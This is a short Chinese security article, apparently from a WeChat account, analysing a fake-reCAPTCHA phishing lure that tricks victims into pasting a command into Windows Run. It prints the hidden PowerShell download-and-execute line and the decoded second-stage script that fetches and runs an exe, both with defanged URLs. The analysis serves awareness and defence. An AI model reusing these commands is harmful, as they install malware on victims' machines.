【网络钓鱼】女神电脑沦陷记

女神电脑沦陷记

通过邮件发送钓鱼信息

访问提示连接不安全

跳转验证机器人操作

诱导你完成复制粘贴

powershell.exe -w hidden -Command "iex (iwr '[https://]2x[.]si/DR1.txt').Content" # "✅ ''I am not a robot - reCAPTCHA Verification ID: 93752"

该命令的作用是启动一个新的 Windows PowerShell 进程并隐藏窗口，然后运行命令来下载脚本文件并执行它。iex是Invoke-Expression的内置别名， iwr是Invoke-WebRequest 。对于Linux 用户来说，这相当于调用curl | bash 。文件末尾有一条注释，由于 Windows 运行框的窗口大小有限，有效地隐藏了脚本的第一部分。

最终还原的脚本如下所示:

$webClient = New-Object System.Net.WebClient$url1 = "[https://]github-scanner[.]com/l6E.exe"$filePath1 = "$env:TEMPSysSetup.exe"$webClient.DownloadFile($url1, $filePath1)Start-Process -FilePath $env:TEMPSysSetup.exe

该脚本非常简单，几乎没有任何混淆。其目的是下载文件l6E.exe ，将其另存为 <User Home>AppDataLocalTempSysSetup.exe ，然后运行该文件。

弱点一: 对于从互联网下载的二进制程序,Windows在运行带有无效代码签名的exe之前没有任何警告。

弱点二:删除Web标记非常容易,如果 .NET 库设置了该标志，攻击者就可以在启动进程之前轻松将其删除。

原文始发于微信公众号（利刃信安）：【网络钓鱼】女神电脑沦陷记